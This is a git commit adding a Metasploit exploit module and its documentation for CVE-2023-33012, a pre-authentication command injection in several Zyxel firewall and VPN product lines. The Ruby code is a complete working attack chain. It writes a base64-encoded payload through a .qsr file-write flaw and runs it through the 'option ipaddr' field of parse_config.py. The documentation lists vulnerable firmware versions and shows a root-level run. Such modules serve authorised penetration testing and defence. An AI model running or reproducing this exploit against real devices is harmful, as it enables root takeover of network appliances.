Land rapid7#19204, Zyxel VPN Series Pre-auth Command Injection

cdelafuente-r7 · cdelafuente-r7 · commit df8f281d1844 · 2024-07-03T20:14:39.000+02:00
diff --git a/documentation/modules/exploit/linux/http/zyxel_parse_config_rce.md b/documentation/modules/exploit/linux/http/zyxel_parse_config_rce.md
@@ -0,0 +1,60 @@
+## Vulnerable Application
+This module exploits multiple vulnerabilities in order to obtain pre-auth command injection the multiple Zyxel device models.
+The exploit chain uses CVE-2023-33012 which is a command injection vulnerability which can be exploited when uploading a
+new configuration to /ztp/cgi-bin/parse_config.py by appending a command to the `option ipaddr ` field.
+
+The command injection is length limited to 0x14 bytes and is why this exploit chains a .qsr file write vulnerability as
+well in order to write the payload to a file which has no length limit and then call the payload with the command
+injection.
+
+Two caveats of this exploit chain were described by Jacob Baines in the following
+[blog post](https://vulncheck.com/blog/zyxel-cve-2023-33012#you-get-one-shot).
+1. In order for the target to be vulnerable Cloud Management Mode (SD-WAN mode) must be enable (it is not by default).
+2. The target can only be exploited once due to the order of operations in which the exploit functions.
+
+| Product                           | Affected Versions               |
+|-----------------------------------|----------------------------------|
+| ATP                               | V5.10 through V5.36 Patch 2      |
+| USG FLEX                          | V5.00 through V5.36 Patch 2      |
+| USG FLEX 50(W) / USG20(W)-VPN     | V5.10 through V5.36 Patch 2      |
+| VPN                               | V5.00 through V5.36 Patch 2      |
+
+### Setup
+
+To test this module you will need to acquire a hardware device running one of the vulnerable firmware versions listed above.
+
+## Options
+
+### WRITEABLE_DIR
+
+This indicates the location where you would like the payload and exploit stored, as well
+as serving as a location to store the various files and directories created by the exploit itself.
+The default value is `/tmp`
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use zyxel_parse_config_rce`
+1. Set the `RHOST` and `LHOST`
+1. Run the module
+1. Receive a Meterpreter session as the `root` user.
+
+## Scenarios
+### Mock USG Flex environment
+```
+msf6 exploit(linux/http/zyxel_parse_config_rce) > set payload cmd/unix/generic
+payload => cmd/unix/generic
+msf6 exploit(linux/http/zyxel_parse_config_rce) > set cmd id
+cmd => id
+msf6 exploit(linux/http/zyxel_parse_config_rce) > set AllowNoCleanup true
+AllowNoCleanup => true
+msf6 exploit(linux/http/zyxel_parse_config_rce) > run
+
+[*] Attempting to upload the payload via QSR file write...
+[+] File write was successful.
+[+] Command output:
+uid=0(root) gid=0(root) groups=0(root)
+
+[!] This exploit may require manual cleanup of '/tmp/N.qsr' on the target
+[*] Exploit completed, but no session was created.
+```
diff --git a/modules/exploits/linux/http/zyxel_parse_config_rce.rb b/modules/exploits/linux/http/zyxel_parse_config_rce.rb
@@ -0,0 +1,181 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Zyxel parse_config.py Command Injection',
+        'Description' => %q{
+          This module exploits vulnerabilities in multiple Zyxel devices including the VPN, USG and APT series.
+          The affected firmware versions depend on the device module, see this module's documentation for more details.
+
+          Note this module was unable to be tested against a real Zyxel device and was tested against a mock environment.
+          If you run into any issues testing this in a real environment we kindly ask you raise an issue in
+          metasploit's github repository: https://github.com/rapid7/metasploit-framework/issues/new/choose
+        },
+        'Author' => [
+          'SSD Secure Disclosure technical team', # discovery
+          'jheysel-r7' # Msf module
+        ],
+        'References' => [
+          [ 'URL', 'https://ssd-disclosure.com/ssd-advisory-zyxel-vpn-series-pre-auth-remote-command-execution/'],
+          [ 'CVE', '2023-33012']
+        ],
+        'License' => MSF_LICENSE,
+        'Platform' => ['linux', 'unix'],
+        'Privileged' => true,
+        'Arch' => [ ARCH_CMD ],
+        'Targets' => [
+          [ 'Automatic Target', {}]
+        ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2024-01-24',
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE, ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, CONFIG_CHANGES ],
+          'Reliability' => [ ] # This vulnerability can only be exploited once, more info: https://vulncheck.com/blog/zyxel-cve-2023-33012#you-get-one-shot
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('WRITABLE_DIR', [ true, 'A directory where we can write files', '/tmp' ]),
+      ]
+    )
+  end
+
+  def check
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'ext-js', 'app', 'common', 'zld_product_spec.js')
+    })
+    return CheckCode::Unknown('No response from /ext-js/app/common/zld_product_spec.js') if res.nil?
+
+    if res.code == 200
+      product_match = res.body.match(/ZLDSYSPARM_PRODUCT_NAME1="([^"]*)"/)
+      version_match = res.body.match(/ZLDCONFIG_CLOUD_HELP_VERSION=([\d.]+)/)
+
+      if product_match && version_match
+        product = product_match[1]
+        version = version_match[1]
+
+        if (product.starts_with?('USG') && product.include?('W') && Rex::Version.new(version) <= Rex::Version.new('5.36.2') && Rex::Version.new(version) >= Rex::Version.new('5.10')) ||
+           (product.starts_with?('USG') && !product.include?('W') && Rex::Version.new(version) <= Rex::Version.new('5.36.2') && Rex::Version.new(version) >= Rex::Version.new('5.00')) ||
+           (product.starts_with?('ATP') && Rex::Version.new(version) <= Rex::Version.new('5.36.2') && Rex::Version.new(version) >= Rex::Version.new('5.10')) ||
+           (product.starts_with?('VPN') && Rex::Version.new(version) <= Rex::Version.new('5.36.2') && Rex::Version.new(version) >= Rex::Version.new('5.00'))
+          return CheckCode::Appears("Product: #{product}, Version: #{version}")
+        else
+          return CheckCode::Safe("Product: #{product}, Version: #{version}")
+        end
+      end
+    end
+    CheckCode::Unknown('Version and product info were unable to be determined.')
+  end
+
+  def on_new_session(session)
+    super
+    command_output = ''
+    # Get the most recently created GRE tunnel interface, bring it down then delete it to allow for subsequent module runs.
+    if session.type.to_s.eql? 'meterpreter'
+      newest_gre = session.sys.process.execute '/bin/sh', "-c \"ip -d link show type gre | grep -oP '^\\d+: \\K[^@]+' | tail -n 1\""
+      print_good("Found the most recently created GRE tunnel interface: #{newest_gre}. Going to delete it to allow for subsequent module runs.")
+      command_output = session.sys.process.execute '/bin/sh', "-c \"ifconfig #{newest_gre} down && ip tunnel del #{newest_gre} mode gre && echo success\""
+    elsif session.type.to_s.eql? 'shell'
+      newest_gre = session.shell_command_token "ip -d link show type gre | grep -oP '^\\d+: \\K[^@]+' | tail -n 1"
+      print_good("Found the most recently created GRE tunnel interface: #{newest_gre}. Going to delete it to allow for subsequent module runs.")
+      command_output = session.shell_command_token "ifconfig #{newest_gre} down && ip tunnel del #{newest_gre} mode gre && echo success"
+    end
+
+    if command_output.include?('success')
+      print_good('The GRE interface was successfully removed.')
+    else
+      print_warning('The module failed to remove the GRE interface created by this exploit. Subsequent module runs will likely fail unless unless it\'s successfully removed')
+    end
+  end
+
+  def exploit
+    # Command injection has a 0x14 byte length limit so keep the file name as small as possible.
+    # The length limit is also why we leverage the arbitrary file write -> write our payload to the .qrs file then execute it with the command injection.
+    filename = rand_text_alpha(1)
+    payload_filepath = "#{datastore['WRITABLE_DIR']}/#{filename}.qsr"
+
+    command = payload.raw
+    command += ' '
+    command += <<~CMD
+      2>/var/log/ztplog 1>/var/log/ztplog
+      (sleep 10 && /bin/rm -rf #{payload_filepath}) &
+    CMD
+    command = "echo #{Rex::Text.encode_base64(command)} | base64 -d > #{payload_filepath} ; . #{payload_filepath}"
+
+    file_write_pload = "option proto vti\n"
+    file_write_pload += "option #{command};exit\n"
+    file_write_pload += "option name 1\n"
+
+    config = Base64.strict_encode64(file_write_pload)
+    data = { 'config' => config, 'fqdn' => "\x00" }
+    print_status('Attempting to upload the payload via QSR file write...')
+
+    file_write_res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'ztp', 'cgi-bin', 'parse_config.py'),
+      'data' => data.to_s
+    })
+    unless file_write_res && !file_write_res.body.include?('ParseError: 0xC0DE0005')
+      fail_with(Failure::PayloadFailed, 'The response from the target indicates the payload transfer was unsuccessful')
+    end
+
+    register_files_for_cleanup(payload_filepath)
+    print_good("File write was successful, uploaded: #{payload_filepath}")
+
+    cmd_injection_pload = "option proto gre\n"
+    cmd_injection_pload += "option name 0\n"
+    cmd_injection_pload += "option ipaddr ;. #{payload_filepath};\n"
+    cmd_injection_pload += "option netmask 24\n"
+    cmd_injection_pload += "option gateway 0\n"
+    cmd_injection_pload += "option localip #{Faker::Internet.private_ip_v4_address}\n"
+    cmd_injection_pload += "option remoteip #{Faker::Internet.private_ip_v4_address}\n"
+    config = Rex::Text.encode_base64(cmd_injection_pload)
+    data = { 'config' => config, 'fqdn' => "\x00" }
+
+    cmd_injection_res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'ztp', 'cgi-bin', 'parse_config.py'),
+      'data' => data.to_s
+    })
+
+    # If the payload being used is for example cmd/unix/generic and not a payload spawning any kind of handler (bind or reverse)
+    # we can query the /ztp/cgi-bin/dumpztplog.py for the stdout of the command and print it for the user.
+    if payload_instance.connection_type == 'none'
+      cmd_output_res = send_request_cgi({
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, 'ztp', 'cgi-bin', 'dumpztplog.py')
+      })
+
+      if cmd_output_res&.body && !cmd_output_res.body.empty?
+        output = cmd_output_res.body.split("</head>\n<body>")[1]
+        output = output.split("</body>\n</html>")[0]
+        output = output.gsub("\n\n<br>", '')
+        output = output.gsub("[IPC]IPC result: 1\n", '')
+        print_good("Command output: #{output}")
+      else
+        print_error("Could not retrieve the command's stout from /ztp/cgi-bin/dumpztplog.py")
+      end
+    end
+
+    unless cmd_injection_res && !cmd_injection_res.body.include?('ParseError: 0xC0DE0005')
+      fail_with(Failure::PayloadFailed, 'The response from the target indicates the payload transfer was unsuccessful')
+    end
+  end
+end
